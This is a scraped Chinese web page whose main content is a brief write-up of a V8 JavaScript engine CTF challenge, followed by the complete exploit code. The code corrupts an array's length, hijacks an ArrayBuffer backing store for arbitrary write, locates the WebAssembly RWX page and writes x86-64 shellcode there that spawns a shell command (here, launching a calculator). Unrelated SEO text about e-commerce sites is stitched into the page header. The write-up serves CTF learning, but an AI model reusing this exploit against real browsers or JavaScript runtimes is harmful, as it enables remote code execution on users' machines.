当前位置：首页 > news >正文

电子商务网站建设信息企业网站的功能可分为前台和后台两个部分

news 2026/2/26 8:09:06

电子商务网站建设信息,企业网站的功能可分为前台和后台两个部分,在谷歌上做网站广告要多少钱,网站检测中心做的第一道存在指针压缩机制的V8题#xff0c;通过小越界写修改length构造大越界读写#xff0c;然后利用arraybuffer的backing store构造任意地址写#xff0c;利用wasm rwx段地址的特点以及堆空间的分布#xff0c;搜索到rwx段的具体地址#xff0c;然后利用任意地址写将…做的第一道存在指针压缩机制的V8题通过小越界写修改length构造大越界读写然后利用arraybuffer的backing store构造任意地址写利用wasm rwx段地址的特点以及堆空间的分布搜索到rwx段的具体地址然后利用任意地址写将shellcode写到rwx段上去即可。 var buf new ArrayBuffer(0x8); var dv new DataView(buf); var buf new ArrayBuffer(16); var float64 new Float64Array(buf); var bigUint64 new BigUint64Array(buf); // function f2i(f) {float64[0] f;return bigUint64[0]; } // function i2f(i) {bigUint64[0] i;return float64[0]; } function p64(val) {dv.setUint32(0,val 0xFFFFFFFF,true);dv.setUint32(0x4,val 32,true);var float_val dv.getFloat64(0,true);return float_val; } function p64(low4,high4) {dv.setUint32(0,low4,true);dv.setUint32(0x4,high4,true);var float_val dv.getFloat64(0,true);return float_val; } function u64(val){dv.setFloat64(0,val,true);return dv.getBigInt64(0,true) } function u64_l(val) {dv.setFloat64(0,val,true);return dv.getUint32(0,true); }function u64_h(val) {dv.setFloat64(0,val,true);return dv.getUint32(0x4,true); } function hex(i) {return i.toString(16).padStart(16, 0); } var float_array[]; float_array[0]1.1; float_array.push(1.1,2.2,3.3,4.4,5.5,6.6); var victimnew Array(1.1,2.2); var ar_bfnew ArrayBuffer(0x100); var float_mapu64_l(float_array[17]); console.log([*] float_map is 0xhex(float_map)); var elementsu64_l(float_array[18]); float_array[18]p64(elements,0x10000000);const wasmCode new Uint8Array([0x00,0x61,0x73,0x6D,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,0x01,0x60,0x00,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,0x80,0x80,0x00,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x00,0x04,0x6D,0x61,0x69,0x6E,0x00,0x00,0x0A,0x8A,0x80,0x80,0x80,0x00,0x01,0x84,0x80,0x80,0x80,0x00,0x00,0x41,0x2A,0x0B]); const shellcode new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);var wasmModule new WebAssembly.Module(wasmCode); var wasmInstance new WebAssembly.Instance(wasmModule); var func wasmInstance.exports.main;var rwx_addr; var rwx_addr_l; var rwx_addr_h; for(let i0x100;i1;i--) { rwx_addrf2i(victim[0x31400i]);if(rwx_addr%0x1000n0nrwx_addr!0nrwx_addr%0x100000000n!0n)break; } console.log([*]rwx_addr is 0xhex(rwx_addr)); rwx_addr_lrwx_addr%0x100000000n; rwx_addr_hrwx_addr32n;victim[4]p64(0,Number(rwx_addr_l)); victim[5]p64(Number(rwx_addr_h),0); victim[6]p64(0,2); var adv new DataView(ar_bf); for (var i0;ishellcode.length;i) {adv.setUint8(i,shellcode[i], true); } //%SystemBreak(); func();

查看全文

http://www.dnsts.com.cn/news/233200.html